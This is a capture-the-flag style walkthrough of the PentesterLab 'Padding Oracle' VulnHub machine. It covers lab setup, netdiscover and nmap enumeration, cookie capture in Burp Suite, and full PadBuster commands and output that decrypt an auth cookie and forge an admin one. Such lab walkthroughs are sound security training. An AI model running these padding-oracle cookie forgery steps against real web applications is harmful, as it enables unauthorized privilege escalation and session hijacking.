Pentester Lab: Padding Oracle || VulnHub Pentester Lab Walkthrough

 Hello, everyone. Today, we're delving into a tutorial series centered on vulnerable machines known as "PenetesterLab". Our focus in this session will be on a machine named "padding oracle".

To begin, you'll need to download the vulnerable image from VulnHub's website. If you're unfamiliar with VulnHub, don’t worry; you can refer to our earlier videos in the VulnHub playlist for a primer.

Vulhub - Vulnerable by Design

This resource provides access to Vulhub, a platform that offers vulnerable environments for security professionals and enthusiasts to practice and improve their penetration testing skills in a safe and legal manner.

Once you have the image, setting up the virtual machine (VM) in VirtualBox is our next step.

Settings Up

In this section, we're going to guide you through setting up a new virtual machine (VM) in VirtualBox. Since the file we've downloaded comes in the ".iso" format, the first step is creating a new VM.

Begin by launching VirtualBox.

Then, click on "New" to initiate the creation of a new virtual machine (VM). 

Next, we'll need to specify the Virtual Machine Name, Operating System type, and version. 

Since we obtained the information from the VulnHub page, we know that the vulnerable iso is Linux-based.

Click next, to customize the hardware settings by adjusting the RAM and Virtual CPU count.

Click Next, and you'll be prompted to create a new virtual hard disk. This step allows you to allocate storage space according to your requirements. 

After configuring the disk, click "Next", to confirm the changes that we did earlier.

Finally, click "Finish" to complete the creation of your VM. Once the VM is created, you'll see it listed in the VirtualBox Manager. Now, Let's organize it by grouping it under "PenetesterLab". 

Now, let's configure the settings. Select the VM, click on "Settings", and navigate to the storage settings. 

Here, add the iso image. 

Now, change the network adapter to "Host-only adapter" in network settings.

It's important to ensure that both your Kali Linux machine, which I use for performing attacks, and the vulnerable machine are connected to the same network.

With everything set up, it's time to start the Virtual Machines. 

You'll notice that the Vulnerable Machine is ready, displaying a shell prompt for input. However, our goal is to access it from the Kali machine. 

Let's dive into the fun!

 

Enumeration

Enumeration is the first process of our attack, aimed at identifying the IP Address of our Target Machine using Net Discover. To do this, open a terminal, run "netdiscover -i" and then specify the network interface name, which is eth1.

┌──(kali㉿kali)-[~]

└─$ sudo netdiscover -i eth1

 Currently scanning: 192.168.106.0/16   |   Screen View: Unique Hosts                                                                

                                                                                                                                     

 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                                     

 _____________________________________________________________________________

   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      

 -----------------------------------------------------------------------------

 192.168.95.1    0a:00:27:00:00:02      1      60  Unknown vendor                                                                    

 192.168.95.2    08:00:27:db:f4:f2      1      60  PCS Systemtechnik GmbH                                                            

 192.168.95.6    08:00:27:94:f4:75      1      60  PCS Systemtechnik GmbH                                                            

From the scan result, we have obtained our target IP address, which is, "192.168.95.6".

Next, we move on to conducting a network scan to identify open ports. This step is crucial in understanding the attack surface and planning targeted attacks. We'll utilize the widely-used Nmap tool for this task. Execute "nmap -A" followed by the IP address. 

┌──(kali㉿kali)-[~]

└─$ nmap -A 192.168.95.6

Where, the "-A" flag enables a comprehensive scan across all available ports, providing insights into the versions running on each port.

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-30 15:45 IST

Nmap scan report for 192.168.95.6

Host is up (0.00056s latency).

Not shown: 997 closed tcp ports (conn-refused)

PORT     STATE SERVICE VERSION

22/tcp   open  ssh     OpenSSH 6.0 (protocol 2.0)

| ssh-hostkey: 

|   1024 8b:4c:a0:14:1c:3c:8c:29:3a:16:1c:f8:1a:70:2a:f3 (DSA)

|   2048 d9:91:5d:c3:ed:78:b5:8c:9a:22:34:69:d5:68:6d:4e (RSA)

|_  256 b2:23:9a:fa:a7:7a:cb:cd:30:85:f9:cb:b8:17:ae:05 (ECDSA)

80/tcp   open  http    Apache httpd 2.2.21 ((Unix) DAV/2 PHP/5.4.3)

|_http-server-header: Apache/2.2.21 (Unix) DAV/2 PHP/5.4.3

|_http-title: [PentesterLab] Padding Oracle

3306/tcp open  mysql   MySQL (unauthorized)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 20.86 seconds

                                                                                                                                      

┌──(kali㉿kali)-[~]

└─$ 

After conducting the network scan, we spotted the presence of 3 open ports: 

• Port 22, using the SSH protocol for secure remote access; 
• Port 80, employing the HTTP protocol, likely indicates a web service; and 
• Port 3306, running a MySQL service, is often used for database management. 

These ports are crucial entry points for data communication within the network.

Specifically, The Port 80/TCP, is basically running an HTTP service. This suggests the presence of a vulnerable web application.

So let’s take a look at the web content running on port 80. To look at the contents ourselves, we can open a web browser of our choice, and navigate to the target's IP address in the URL bar at the top of the window.

Upon inspecting the webpage, a potential vulnerability emerges, indicating a task requiring admin access to complete. Specifically, a padding Oracle vulnerability is detected, obviating the need for further scanning.

To comprehend the workings of a padding oracle, reference the following article for detailed insight, crucial for successful exploitation.

Padding Oracle Course by PentesterLab

This course offered by PentesterLab focuses on the Padding Oracle vulnerability, providing hands-on exercises and practical knowledge to help individuals understand and exploit this vulnerability effectively.

Moving forward, exploitation necessitates obtaining admin session privileges. Initially, registration is required. Click on the registration button, and provide a username and password.

Upon successful login with the registered username, the primary objective remains acquiring admin access.

Subsequently, the authentication must be manipulated to achieve admin privileges. Utilizing Burp Suite, capture the cookies to facilitate this process.

Begin by initiating Burp Suite. 

Proceed to configure your browser's proxy settings using FoxyProxy. 

Access the proxy tab and activate intercept mode to capture target requests. Switch the proxy to Burp Suite within the FoxyProxy extension. 

Re-login using the registered credentials. Upon completion, captured data will populate the intercept window. 

Right-click within this window to reveal a list of options, selecting "Send to Repeater." 

This action opens two panels, one for request and the other for response, facilitating further analysis.

In the left panel, submit the user credentials and password as part of the request, then proceed to execute the request by clicking on the "send" button. 

This action will trigger the generation of an authentication cookie, observable in the right panel as part of the response.

Subsequently, extract the highlighted cookie, as it serves as a pivotal component in acquiring admin access.

To facilitate this process, the "padbuster" tool proves indispensable. 

Using PadBuster

Initiate the procedure by accessing a terminal in Kali Linux and invoking the "padbuster" command. 

┌──(kali㉿kali)-[~]

└─$ padbuster

Command 'padbuster' not found, but can be installed with:

sudo apt install padbuster

Do you want to install it? (N/y)

If the tool is not already installed, a prompt will guide you through the installation process, requiring confirmation ('Y') to proceed.

Do you want to install it? (N/y)y

sudo apt install padbuster

[sudo] password for kali: 

Reading package lists... Done

Building dependency tree... Done

Reading state information... Done

The following packages were automatically installed and are no longer required:

  libadwaita-1-0 libaio1 libappstream5 libatk-adaptor libboost-dev libboost1.83-dev libopenblas-dev libopenblas-pthread-dev

  libopenblas0 libpython3-all-dev libpython3.12 libpython3.12-dev libstemmer0d libxmlb2 libxsimd-dev python3-all-dev python3-anyjson

  python3-beniget python3-gast python3-pyatspi python3-pypdf2 python3-pyppeteer python3-pyrsistent python3-pythran python3.12-dev

  xtl-dev zenity zenity-common

Use 'sudo apt autoremove' to remove them.

The following NEW packages will be installed:

  padbuster

0 upgraded, 1 newly installed, 0 to remove and 0 not upgraded.

Need to get 12.1 kB of archives.

After this operation, 41.0 kB of additional disk space will be used.

Get:1 http://http.kali.org/kali kali-rolling/main amd64 padbuster all 0.3.3+git20210818.50e4a3e-1kali1 [12.1 kB]

Fetched 12.1 kB in 18s (658 B/s)                                                                                                     

Selecting previously unselected package padbuster.

(Reading database ... 413656 files and directories currently installed.)

Preparing to unpack .../padbuster_0.3.3+git20210818.50e4a3e-1kali1_all.deb ...

Unpacking padbuster (0.3.3+git20210818.50e4a3e-1kali1) ...

Setting up padbuster (0.3.3+git20210818.50e4a3e-1kali1) ...

Processing triggers for kali-menu (2023.4.7) ...

Scanning processes...                                                                                                                 

Scanning linux images...                                                                                                              

Running kernel seems to be up-to-date.

No services need to be restarted.

No containers need to be restarted.

No user sessions are running outdated binaries.

No VM guests are running outdated hypervisor (qemu) binaries on this host.

                                                                                                                                      

┌──(kali㉿kali)-[~]

└─$

Upon successful installation, execute the "padbuster -h" command to access the help documentation, thereby familiarizing yourself with the tool's functionalities and command syntax.

┌──(kali㉿kali)-[~]

└─$ padbuster -h

Option headers requires an argument

+-------------------------------------------+

| PadBuster - v0.3.3                        |

| Brian Holyfield - Gotham Digital Science  |

| [email protected]                      |

+-------------------------------------------+

    

    Use: padbuster URL EncryptedSample BlockSize [options]

  Where: URL = The target URL (and query string if applicable)

         EncryptedSample = The encrypted value you want to test. Must

                           also be present in the URL, PostData or a Cookie

         BlockSize = The block size being used by the algorithm

Options:

         -auth [username:password]: HTTP Basic Authentication 

         -bruteforce: Perform brute force against the first block 

         -ciphertext [Bytes]: CipherText for Intermediate Bytes (Hex-Encoded)

         -cookies [HTTP Cookies]: Cookies (name1=value1; name2=value2)

         -encoding [0-4]: Encoding Format of Sample (Default 0)

                          0=Base64, 1=Lower HEX, 2=Upper HEX

                          3=.NET UrlToken, 4=WebSafe Base64

         -encodedtext [Encoded String]: Data to Encrypt (Encoded)

         -error [Error String]: Padding Error Message

         -headers [HTTP Headers]: Custom Headers (name1::value1;name2::value2)

         -interactive: Prompt for confirmation on decrypted bytes

         -intermediate [Bytes]: Intermediate Bytes for CipherText (Hex-Encoded)

         -log: Generate log files (creates folder PadBuster.DDMMYY)

         -noencode: Do not URL-encode the payload (encoded by default)

         -noiv: Sample does not include IV (decrypt first block) 

         -plaintext [String]: Plain-Text to Encrypt

         -post [Post Data]: HTTP Post Data String

         -prefix [Prefix]: Prefix bytes to append to each sample (Encoded) 

         -proxy [address:port]: Use HTTP/S Proxy

         -proxyauth [username:password]: Proxy Authentication

         -resume [Block Number]: Resume at this block number

         -usebody: Use response body content for response analysis phase

         -verbose: Be Verbose

         -veryverbose: Be Very Verbose (Debug Only)

         

                                                                                                                                      

┌──(kali㉿kali)-[~]

└─$

To utilize PadBuster, initiate the command by typing "padbuster" followed by the URL of the login page. Subsequently, paste the Authentication Encrypted value. Specify the block size utilized by the algorithm. Within the options, select the cookies method. Now, set the encoding to base64 (designated as 0).

┌──(kali㉿kali)-[~]

└─$ padbuster http://192.168.95.6/login.php 2p64EMt%2BUQPvtydis61NgyTfJchTn69f 8 -cookies auth=2p64EMt%2BUQPvtydis61NgyTfJchTn69f -encoding 0

+-------------------------------------------+

| PadBuster - v0.3.3                        |

| Brian Holyfield - Gotham Digital Science  |

| [email protected]                      |

+-------------------------------------------+

INFO: The original request returned the following

[+] Status: 200

[+] Location: N/A

[+] Content Length: 1530

INFO: Starting PadBuster Decrypt Mode

*** Starting Block 1 of 2 ***

INFO: No error string was provided...starting response analysis

*** Response Analysis Complete ***

The following response signatures were returned:

-------------------------------------------------------

ID#     Freq    Status  Length  Location

-------------------------------------------------------

1       1       200     1677    N/A

2 **    255     200     15      N/A

-------------------------------------------------------

Enter an ID that matches the error condition

NOTE: The ID# marked with ** is recommended :

Upon hitting enter, PadBuster begins the process of decrypting data acquired from the target web application, employing AES-CBC encryption.

Subsequently, input the ID corresponding to the error condition.

NOTE: The ID# marked with ** is recommended : 2

Continuing test with selection 2

[+] Success: (153/256) [Byte 8]

[+] Success: (224/256) [Byte 7]

[+] Success: (248/256) [Byte 6]

[+] Success: (14/256) [Byte 5]

[+] Success: (153/256) [Byte 4]

[+] Success: (37/256) [Byte 3]

[+] Success: (22/256) [Byte 2]

[+] Success: (89/256) [Byte 1]

Block 1 Results:

[+] Cipher Text (HEX): efb72762b3ad4d83

[+] Intermediate Bytes (HEX): afeddd62f60b2266

[+] Plain Text: user=use

Use of uninitialized value $plainTextBytes in concatenation (.) or string at /usr/bin/padbuster line 361, <STDIN> line 1.

*** Starting Block 2 of 2 ***

[+] Success: (123/256) [Byte 8]

[+] Success: (184/256) [Byte 7]

[+] Success: (87/256) [Byte 6]

[+] Success: (80/256) [Byte 5]

[+] Success: (160/256) [Byte 4]

[+] Success: (218/256) [Byte 3]

[+] Success: (73/256) [Byte 2]

[+] Success: (107/256) [Byte 1]

Block 2 Results:

[+] Cipher Text (HEX): 24df25c8539faf5f

[+] Intermediate Bytes (HEX): 9db02065b4aa4a84

[+] Plain Text: r

-------------------------------------------------------

** Finished ***

[+] Decrypted value (ASCII): user=user

[+] Decrypted value (HEX): 757365723D7573657207070707070707

[+] Decrypted value (Base64): dXNlcj11c2VyBwcHBwcHBw==

-------------------------------------------------------

                                                                                                                                      

┌──(kali㉿kali)-[~]

└─$ 

Upon execution, PadBuster successfully decrypts the ciphertext retrieved from the application, unveiling the plaintext value "user=user." Additionally, it presents the decrypted value in ASCII, hexadecimal, and Base64 formats.

We're on the verge of achieving our objective; simply encrypt the auth cookie with the user set as admin once more. Given the plaintext "admin," let's utilize PadBuster for encoding.

┌──(kali㉿kali)-[~]

└─$ padbuster http://192.168.95.6/login.php 2p64EMt%2BUQPvtydis61NgyTfJchTn69f 8 -cookies auth=2p64EMt%2BUQPvtydis61NgyTfJchTn69f -encoding 0 -plaintext user=admin

+-------------------------------------------+

| PadBuster - v0.3.3                        |

| Brian Holyfield - Gotham Digital Science  |

| [email protected]                      |

+-------------------------------------------+

INFO: The original request returned the following

[+] Status: 200

[+] Location: N/A

[+] Content Length: 1530

INFO: Starting PadBuster Encrypt Mode

[+] Number of Blocks: 2

INFO: No error string was provided...starting response analysis

*** Response Analysis Complete ***

The following response signatures were returned:

-------------------------------------------------------

ID#     Freq    Status  Length  Location

-------------------------------------------------------

1       1       200     1677    N/A

2 **    255     200     15      N/A

-------------------------------------------------------

Enter an ID that matches the error condition

NOTE: The ID# marked with ** is recommended :

Specify "2" when prompted for the recommended ID.

NOTE: The ID# marked with ** is recommended : 2

Continuing test with selection 2

[+] Success: (196/256) [Byte 8]

[+] Success: (148/256) [Byte 7]

[+] Success: (92/256) [Byte 6]

[+] Success: (41/256) [Byte 5]

[+] Success: (218/256) [Byte 4]

[+] Success: (136/256) [Byte 3]

[+] Success: (150/256) [Byte 2]

[+] Success: (190/256) [Byte 1]

Block 2 Results:

[+] New Cipher Text (HEX): 23037825d5a1683b

[+] Intermediate Bytes (HEX): 4a6d7e23d3a76e3d

[+] Success: (1/256) [Byte 8]

[+] Success: (36/256) [Byte 7]

[+] Success: (180/256) [Byte 6]

[+] Success: (17/256) [Byte 5]

[+] Success: (146/256) [Byte 4]

[+] Success: (50/256) [Byte 3]

[+] Success: (132/256) [Byte 2]

[+] Success: (135/256) [Byte 1]

Block 1 Results:

[+] New Cipher Text (HEX): 0408ad19d62eba93

[+] Intermediate Bytes (HEX): 717bc86beb4fdefe

-------------------------------------------------------

** Finished ***

[+] Encrypted value is: BAitGdYuupMjA3gl1aFoOwAAAAAAAAAA

-------------------------------------------------------

                                                                                                                                      

┌──(kali㉿kali)-[~]

└─$

PadBuster successfully encrypts the plaintext, yielding the corresponding ciphertext. Copy this encrypted value.

Return to the browser and refresh the page, ensuring that the proxy is set to Burp Suite. 

Upon interception of the data, modify the auth value with the generated value from PadBuster.

Click "Forward" to transmit this request to the web server.  Burp Suite automatically dispatches a request to the web server, resulting in login with admin privileges.

Congratulations! We've accomplished the lab's goal.

There's no necessity to foothold the VM. Any doubts or queries can be addressed by leaving a comment in the section below.